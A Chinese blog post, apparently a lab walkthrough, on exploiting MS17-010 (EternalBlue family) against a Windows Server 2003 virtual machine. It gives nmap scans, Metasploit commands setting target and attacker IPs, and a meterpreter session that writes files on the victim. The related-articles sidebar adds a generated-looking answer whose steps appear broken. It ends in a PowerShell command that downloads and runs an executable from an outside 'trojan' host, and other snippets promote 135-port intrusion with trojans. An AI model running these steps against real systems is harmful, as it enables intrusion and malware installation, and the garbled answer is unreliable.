Kali linux利用(ms17-010)漏洞入侵Windows server 2003

最新推荐文章于 2024-07-02 16:15:00 发布
最新推荐文章于 2024-07-02 16:15:00 发布
阅读量7.3k 收藏 42
点赞数 11
分类专栏: kali linux学习笔记 文章标签: linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44847002/article/details/105263781
版权

NMAP MSF实现对目标系统渗透(Windows server 2003控制)

  1. Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
  2. 此次采用kali Linux系统集成的metasploit进行测试验证MS17-010(永恒之蓝,著名比特币勒索漏洞)。实验环境均采用虚拟机。

前提准备:
Kali linux: 192.168.1.113
Windows server2003:192.168.1.102

1,方式一先使用nmap探测网络中存活主机(设备)

在这里插入图片描述
方式二
root@wangzhike:~# netdiscover -i eth0 -r 192.168.1.0/24
在这里插入图片描述
目标系统:192.168.1.102 windows server 2003

2,探测网络中的系统类型(nmap)
root@wangzhike:~# nmap -O 192.168.1.0/24
在这里插入图片描述
3.端口扫描
root@wangzhike:~# nmap -p 1-1000 192.168.1.102

root@wangzhike:~# nmap -p 1-1000 192.168.1.102
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 12:46 CST
Nmap scan report for 192.168.1.102
Host is up (0.000071s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:82:C6:C2 (VMware)

端口介绍:
135端口:服务dcom、rpc的端口----客户机连入系统服务
139端口:netbios文件打印共享服务—共享磁盘
445端口:文件夹共享、打印共享服务

4,利用server 2003自身漏洞(ms17-010)
前提:Windows server 2003 需要关闭防火墙。
入侵前必须初始、启动数据库。

root@wangzhike:~# msfdb init		//初始化数据库
root@wangzhike:~# msfdb start		//启动数据库
root@wangzhike:~# netstat -ntlup | grep post 	//查看端口
root@wangzhike:~# msfdb status		//查看数据库状态

在这里插入图片描述
root@wangzhike:~# nmap --script=smb-vuln*.nse 192.168.1.102
在这里插入图片描述
我们·可以看到Windows server 2003存在ms17-010漏洞

root@wangzhike:~# msfconsole

在进入后
#####进入后不一定是这种样式#####

msf > search ms17_010 //搜索查看漏洞

[!] Module database cache not built yet, using slow search
Matching Modules
================
   Name                                           Disclosure Date  Rank     Description
   ----                                           ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf >

我们利用这个模块:exploit/windows/smb/ms17_010_psexec
msf > use windows/smb/ms17_010_psexec //利用模块
在这里插入图片描述

set rhosts 192.168.1.102	//设置攻击目标的IP地址
set lhost 192.168.1.113		//攻击机ip地址

进行攻击run侵入:

在这里插入图片描述
侵入后可看到meterpreter>
我们就可以使用ifconfig命令
查看ip地址为192.168.1.102
####地址为192.168.1.102####
查看当前目录pwd
在这里插入图片描述
在C:\WINDOWS目录中创建wang.txt和hello.txt文件
在这里插入图片描述
在Windows server 2003中查看创建的两个目录
在这里插入图片描述
当然我们也可以进行其他控制!!!

至此,我们就可以使用kali linux 控制Windows server 2003啦!!!

24...
关注
  • 11
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 8
    评论
专栏目录
网络安全kali web安全 Kalimsf简单的漏洞利用
xueshenlaila的博客
03-08 1万+
信息收集 靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds 777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp LSA-or-nterm 1029/tcp ms
Metasploit简单利用入侵Windows7案例.docx
11-13
通过对MS17_010和MS08-067漏洞利用实验,我们不仅了解了如何使用Metasploit框架进行漏洞探测和攻击,还掌握了如何有效利用这些漏洞获得对目标系统的控制权。这两种漏洞都是历史上非常著名的Windows系统漏洞,通过...
Kali Linux渗透测试基础入门到进阶实战全程课
09-29
课程标题:Kali Linux渗透测试基础入门到进阶实战全程课一、课程声明       本课程所有分享仅做学习交流,切勿用于任何不法用途,请每位学员自觉遵守网络安全法等法律法规!二、课程概要       本课程主要分享Kali Linux渗透测试基础入门到进阶实战全程技巧!三、适合人员       1、零基础大学生       2、IT技术人员       3、运维工程师       4、渗透测试工程师       5、漏洞挖掘工程师四、特别说明       1、本课程支持一次购买,永久观看!       2、本课系讲师原创课程,请勿盗用!
记录一次体验kali渗透工具MSF以及msfconsole命令详解
ch_ycc的博客
04-22 3279
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用。
2024年最新kali Linux安装教程(超详细,图文并茂)
最新发布
2302_76672693的博客
07-02 1906
2024年最新kali Linux安装教程(超详细,图文并茂)
kali-Linux局域网渗透之Win2003
LJHandCXY的博客
02-27 3814
相关参数 kali的IP地址为:192.168.0.103/24 win2003的IP地址为:192.168.0.138/24 1.蓝屏攻击   原理:利用操作系统内核的缺陷,发送大量数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码   前提:对方开启3389端口且只对某些操作系统有效   操作: 1.扫描 nmap -sS -O [IP地址] 或 nmap -sT [IP地址] 大家看着来啊!(我是比较习惯用这两个) 如果大家扫描0
永恒之蓝——Windows server 2003 漏洞复现
Megumiwind的博客
07-28 1631
复现漏洞 靶机:Windows server 2003 IP:192.168.64.129 攻击机:kali 2021 1.在kali中启动msf模块 在控制台输入:msfconsole,或者在文件的漏洞利用工具集中双击metasploit framework进入msf。 进入后页面如下,图像为随机图像,如若与上图不符合实属正常现象。 2.搜索ms17_010:search ms17_010 3.使用命令:use auxiliary/scanner/smb/smb_ms1...
135端口入侵教程(仅学习用)
热门推荐
sc8001的专栏
05-27 1万+
大家好我是sc8001(引用)今天给大家带来的是135端口入侵教程!前几天看的教程都是要通过TELNET连接才可以下载到肉鸡上,现在给大家带来的是不用TELNET连接,直接给肉鸡下载木马要用到的工具是:Recton V2.5    连接用的 NTscan      扫描用的一个免杀的木马(我这里用鸽子!)首先打开NTscan,输入一个要扫描的网段,选WMI扫描 端口写135然后开始!为了节省时间我
Kali Linux渗透测试 135 免杀简介
kevinhanser
04-13 3737
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 恶意软件 病毒、木马、蠕虫、键盘激励、僵尸程序、流氓软件、勒索软件、广告程序 在用户非自愿的情况下执行安装 处于某种恶意的目的:控制、窃取、勒索、偷窥、推送、攻击…… 2. 防病毒软件 恶意程序最主要
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
135端口的入侵入侵过程中常见的情况
10-16
135端口的入侵相关问题 很好的一个135端口入侵解析,希望朋友们多多支持!
2010年最新利用135端口入侵网吧主机教程
03-06
2010年最新利用135端口入侵网吧主机教程 后续在给大家做个传马上线教程
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
网络安全-实验三ms17-010漏洞利用.docx
11-10
MS17-010漏洞,也称为“永恒之蓝”(EternalBlue),是针对Microsoft Windows操作系统的一个严重漏洞,主要影响Windows XP、Windows 7以及Server 2003和2008等未打补丁的系统。该漏洞利用的是SMB(Server Message ...
记一次利用kali和win xp以及win server2003进行模拟中间人攻击
weixin_52515588的博客
05-01 600
目录 攻击原理: 环境搭建 开启ARP欺骗 利用kali系统模拟攻击者,利用中间人的攻击手段来获取用户登录的用户名与密码。 前期准备: win xp (模拟用户机) winserver 2003(模拟web及ftp服务器) kali(模拟攻击者) 交换机是根据帧头MAC地址进行转发的【mac地址表是自动形成的】 交换机只检查帧头 攻击原理: 利用ARP协议【网络层协议】漏洞 已知IP解析MAC地址 ARP协议原理: (1)发送ARP广播请求 ...
Kali Linux远程连接Windows服务器
weixin_30361753的博客
11-30 3234
前言: 为了在Kali上远程连接Windows系统的服务器我们需要安装两个工具,rdesktop和tsclient。另外,我们从主机服务商那里购买的Windows操作系统的服务器都是默认开启了远程连接的,如果我们要在局域网里连接桌面版的Windows系统一般还需要开启并配置好远程桌面。 操作步骤: 安装rdesktop,输入命令: apt-get install rdeskto...
针对win2003服务器的恶意代码攻击
C_Ronaldo__的博客
08-08 459
针对win2003服务器的恶意代码攻击 目录针对win2003服务器的恶意代码攻击实验环境恶意代码语言构建与解释:关键命令语句解释:交互式:非交互式:实验过程:#配置网段和IP,使其相互ping通使用ntscan扫描以及暴力破解服务器账户与密码将恶意代码植入2003服务器控制目标主机自动运行恶意代码退出登录,攻击结束漏洞分析与防御IPC$密码设置管理员权限 摘要: 再本次实验中,利用批处理语言写出一个简单的脚本恶意代码,按照功能与使用场景不同,分成了交互时和非交互式两个版本,交互式版本可以伪装成杀毒软件,诱
kali攻防windous漏洞攻防蓝屏命令行视图操作
c673929079的博客
05-16 3558
kali攻防windous漏洞攻防蓝屏命令行视图操作
kali利用ms17-010挂马
12-15
根据提供的引用内容,我们无法回答与网站挂马和文本输入相关的问题。关于kali利用ms17-010挂马的问题,我们需要先了解一下ms17-010是什么。ms17-010是指微软在2017年3月份发布的一个安全补丁,用于修复Windows操作系统中的SMBv1漏洞。攻击者可以利用漏洞远程执行代码,从而控制受感染的计算机。以下是kali利用ms17-010挂马的步骤: 1. 打开终端,输入以下命令更新kali系统: ```shell sudo apt-get update sudo apt-get upgrade ``` 2. 下载ms17-010漏洞利用工具,可以从GitHub上下载: ```shell git clone https://github.com/worawit/MS17-010.git ``` 3. 进入MS17-010目录,运行以下命令编译漏洞利用工具: ```shell cd MS17-010 make ``` 4. 执行以下命令,扫描目标主机是否存在SMBv1漏洞: ```shell ./send_and_execute 192.168.1.100 whoami.exe ``` 5. 如果目标主机存在SMBv1漏洞,执行以下命令,获取目标主机的Shell: ```shell ./eternalblue 192.168.1.100 shellcode.bin ``` 6. 执行以下命令,连接目标主机的Shell: ```shell nc 192.168.1.100 4444 ``` 7. 在目标主机的Shell中执行以下命令,下载并执行挂马程序: ```shell powershell -c "(new-object System.Net.WebClient).DownloadFile('http://www.trojan.com/1.exe','C:\Windows\Temp\1.exe');Start-Process 'C:\Windows\Temp\1.exe'" ``` 需要注意的是,上述步骤仅供学习和研究使用,请勿用于非法用途。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

24...

谢谢,只求点赞哟

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值